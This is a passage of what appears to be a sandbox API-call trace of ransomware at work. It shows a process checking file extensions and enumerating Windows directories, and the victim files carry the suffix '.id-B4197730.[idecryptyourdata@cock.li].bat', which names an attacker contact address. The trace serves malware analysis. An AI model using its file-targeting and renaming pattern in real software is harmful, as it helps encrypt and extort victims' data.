[0155.176] lstrlenW (lpString=".mkv") returned 4 [0155.176] lstrcmpiW (lpString1=".mkv", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mos") returned 4 [0155.176] lstrcmpiW (lpString1=".mos", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mov") returned 4 [0155.176] lstrcmpiW (lpString1=".mov", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mp3") returned 4 [0155.176] lstrcmpiW (lpString1=".mp3", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mp4") returned 4 [0155.176] lstrcmpiW (lpString1=".mp4", lpString2=".bat") returned 1 [0155.176] lstrlenW (lpString=".mpeg") returned 5 [0155.176] lstrcmpiW (lpString1=".mpeg", lpString2="].bat") returned -1 [0155.177] lstrlenW (lpString=".mpg") returned 4 [0155.177] lstrcmpiW (lpString1=".mpg", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".mpv") returned 4 [0155.177] lstrcmpiW (lpString1=".mpv", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".mrw") returned 4 [0155.177] lstrcmpiW (lpString1=".mrw", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".msg") returned 4 [0155.177] lstrcmpiW (lpString1=".msg", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".mxl") returned 4 [0155.177] lstrcmpiW (lpString1=".mxl", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".myd") returned 4 [0155.177] lstrcmpiW (lpString1=".myd", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".myi") returned 4 [0155.177] lstrcmpiW (lpString1=".myi", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".nef") returned 4 [0155.177] lstrcmpiW (lpString1=".nef", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".nrw") returned 4 [0155.177] lstrcmpiW (lpString1=".nrw", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".obj") returned 4 [0155.177] lstrcmpiW (lpString1=".obj", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".odb") returned 4 [0155.177] lstrcmpiW (lpString1=".odb", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".odc") returned 4 [0155.177] lstrcmpiW (lpString1=".odc", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".odm") returned 4 [0155.177] lstrcmpiW (lpString1=".odm", lpString2=".bat") returned 1 [0155.177] lstrlenW (lpString=".odp") returned 4 [0155.177] lstrcmpiW (lpString1=".odp", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".ods") returned 4 [0155.178] lstrcmpiW (lpString1=".ods", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".oft") returned 4 [0155.178] lstrcmpiW (lpString1=".oft", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".one") returned 4 [0155.178] lstrcmpiW (lpString1=".one", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".onepkg") returned 7 [0155.178] lstrcmpiW (lpString1=".onepkg", lpString2="li].bat") returned -1 [0155.178] lstrlenW (lpString=".onetoc2") returned 8 [0155.178] lstrcmpiW (lpString1=".onetoc2", lpString2=".li].bat") returned 1 [0155.178] lstrlenW (lpString=".opt") returned 4 [0155.178] lstrcmpiW (lpString1=".opt", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".oqy") returned 4 [0155.178] lstrcmpiW (lpString1=".oqy", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".orf") returned 4 [0155.178] lstrcmpiW (lpString1=".orf", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".p12") returned 4 [0155.178] lstrcmpiW (lpString1=".p12", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".p7b") returned 4 [0155.178] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".p7c") returned 4 [0155.178] lstrcmpiW (lpString1=".p7c", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".pam") returned 4 [0155.178] lstrcmpiW (lpString1=".pam", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".pbm") returned 4 [0155.178] lstrcmpiW (lpString1=".pbm", lpString2=".bat") returned 1 [0155.178] lstrlenW (lpString=".pct") returned 4 [0155.178] lstrcmpiW (lpString1=".pct", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pcx") returned 4 [0155.179] lstrcmpiW (lpString1=".pcx", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pdd") returned 4 [0155.179] lstrcmpiW (lpString1=".pdd", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pdf") returned 4 [0155.179] lstrcmpiW (lpString1=".pdf", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pdp") returned 4 [0155.179] lstrcmpiW (lpString1=".pdp", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pef") returned 4 [0155.179] lstrcmpiW (lpString1=".pef", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pem") returned 4 [0155.179] lstrcmpiW (lpString1=".pem", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pff") returned 4 [0155.179] lstrcmpiW (lpString1=".pff", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pfm") returned 4 [0155.179] lstrcmpiW (lpString1=".pfm", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pfx") returned 4 [0155.179] lstrcmpiW (lpString1=".pfx", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".pgm") returned 4 [0155.179] lstrcmpiW (lpString1=".pgm", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".php") returned 4 [0155.179] lstrcmpiW (lpString1=".php", lpString2=".bat") returned 1 [0155.179] lstrlenW (lpString=".php3") returned 5 [0155.179] lstrcmpiW (lpString1=".php3", lpString2="].bat") returned -1 [0155.179] lstrlenW (lpString=".php4") returned 5 [0155.179] lstrcmpiW (lpString1=".php4", lpString2="].bat") returned -1 [0155.179] lstrlenW (lpString=".php5") returned 5 [0155.180] lstrcmpiW (lpString1=".php5", lpString2="].bat") returned -1 [0155.180] lstrlenW (lpString=".phtml") returned 6 [0155.180] lstrcmpiW (lpString1=".phtml", lpString2="i].bat") returned -1 [0155.180] lstrlenW (lpString=".pict") returned 5 [0155.180] lstrcmpiW (lpString1=".pict", lpString2="].bat") returned -1 [0155.180] lstrlenW (lpString=".pl") returned 3 [0155.180] lstrcmpiW (lpString1=".pl", lpString2="bat") returned -1 [0155.180] lstrlenW (lpString=".pls") returned 4 [0155.180] lstrcmpiW (lpString1=".pls", lpString2=".bat") returned 1 [0155.180] lstrlenW (lpString=".pm") returned 3 [0155.180] lstrcmpiW (lpString1=".pm", lpString2="bat") returned -1 [0155.180] lstrlenW (lpString=".png") returned 4 [0155.180] lstrcmpiW (lpString1=".png", lpString2=".bat") returned 1 [0155.180] lstrlenW (lpString=".pnm") returned 4 [0155.180] lstrcmpiW (lpString1=".pnm", lpString2=".bat") returned 1 [0155.180] lstrlenW (lpString=".pot") returned 4 [0155.180] lstrcmpiW (lpString1=".pot", lpString2=".bat") returned 1 [0155.180] lstrlenW (lpString=".potm") returned 5 [0155.180] lstrcmpiW (lpString1=".potm", lpString2="].bat") returned -1 [0155.180] lstrlenW (lpString=".potx") returned 5 [0155.180] lstrcmpiW (lpString1=".potx", lpString2="].bat") returned -1 [0155.180] lstrlenW (lpString=".ppa") returned 4 [0155.180] lstrcmpiW (lpString1=".ppa", lpString2=".bat") returned 1 [0155.180] lstrlenW (lpString=".ppam") returned 5 [0155.180] lstrcmpiW (lpString1=".ppam", lpString2="].bat") returned -1 [0155.180] lstrlenW (lpString=".ppm") returned 4 [0155.181] lstrcmpiW (lpString1=".ppm", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".pps") returned 4 [0155.181] lstrcmpiW (lpString1=".pps", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".ppsm") returned 5 [0155.181] lstrcmpiW (lpString1=".ppsm", lpString2="].bat") returned -1 [0155.181] lstrlenW (lpString=".ppt") returned 4 [0155.181] lstrcmpiW (lpString1=".ppt", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".pptm") returned 5 [0155.181] lstrcmpiW (lpString1=".pptm", lpString2="].bat") returned -1 [0155.181] lstrlenW (lpString=".pptx") returned 5 [0155.181] lstrcmpiW (lpString1=".pptx", lpString2="].bat") returned -1 [0155.181] lstrlenW (lpString=".prn") returned 4 [0155.181] lstrcmpiW (lpString1=".prn", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".ps") returned 3 [0155.181] lstrcmpiW (lpString1=".ps", lpString2="bat") returned -1 [0155.181] lstrlenW (lpString=".psb") returned 4 [0155.181] lstrcmpiW (lpString1=".psb", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".psd") returned 4 [0155.181] lstrcmpiW (lpString1=".psd", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".pst") returned 4 [0155.181] lstrcmpiW (lpString1=".pst", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".ptx") returned 4 [0155.181] lstrcmpiW (lpString1=".ptx", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".pub") returned 4 [0155.181] lstrcmpiW (lpString1=".pub", lpString2=".bat") returned 1 [0155.181] lstrlenW (lpString=".pwm") returned 4 [0155.181] lstrcmpiW (lpString1=".pwm", lpString2=".bat") returned 1 [0155.181] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd39c503, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd39c503, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd39c503, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1894, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="oobe_2017_09_07_03_08_57_737.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="OOBE_2~1.BAT")) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 0 [0155.182] FindClose (in: hFindFile=0x6ba170 | out: hFindFile=0x6ba170) returned 1 [0155.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dc0958 | out: hHeap=0x6a0000) returned 1 [0155.183] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0155.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3dc0958 [0155.183] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName=".", cAlternateFileName="")) returned 0x6ba170 [0155.185] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="..", cAlternateFileName="")) returned 1 [0155.185] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb6a1de, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcb6a1de, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0ed8ee, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x233c8, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="GetCurrentOOBE.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="GETCUR~1.BAT")) returned 1 [0155.185] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcf70119, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="GetCurrentRollback.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="GETCUR~2.BAT")) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb6a1de, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcb6a1de, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcf49f2d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="PartnerSetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARTNE~1.BAT")) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd07b1b1, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd07b1b1, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd07b1b1, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="preoobe.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PREOOB~1.BAT")) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcaab581, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcaab581, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcb43f4a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPC~1.BAT")) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcaab581, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcaab581, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfcb43f4a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xfffff7b2, dwReserved1=0x5a5, cFileName="SetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPC~1.BAT")) returned 0 [0155.186] FindClose (in: hFindFile=0x6ba170 | out: hFindFile=0x6ba170) returned 1 [0155.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dc0958 | out: hHeap=0x6a0000) returned 1 [0155.187] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0155.187] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0155.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0155.188] FindNextFileW (in: hFindFile=0x6ba870, lpFindFileData=0x34ffcf8 | out: lpFindFileData=0x34ffcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0155.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3db0950 [0155.189] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName=".", cAlternateFileName="")) returned 0x6ba130 [0155.190] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="..", cAlternateFileName="")) returned 1 [0155.190] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0155.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3dc0958 [0155.190] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x16, ftLastAccessTime.dwLowDateTime=0x2, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x3a2, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName="\xf7b2\xffff\xe2c0\x78\x1ff", cAlternateFileName="\xa040\x6f\x08")) returned 0xffffffff [0155.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dc0958 | out: hHeap=0x6a0000) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0155.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3dc0958 [0155.191] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName=".", cAlternateFileName="")) returned 0x6ba170 [0155.191] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName="..", cAlternateFileName="")) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x95b8e1dc, ftCreationTime.dwHighDateTime=0x1d50396, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd008b26, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd008b26, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffd4d2, dwReserved1=0x3a4, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 0 [0155.191] FindClose (in: hFindFile=0x6ba170 | out: hFindFile=0x6ba170) returned 1 [0155.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dc0958 | out: hHeap=0x6a0000) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0155.192] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0155.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0155.192] FindNextFileW (in: hFindFile=0x6ba870, lpFindFileData=0x34ffcf8 | out: lpFindFileData=0x34ffcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0155.193] FindNextFileW (in: hFindFile=0x6ba870, lpFindFileData=0x34ffcf8 | out: lpFindFileData=0x34ffcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0155.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x3db0950 [0155.193] 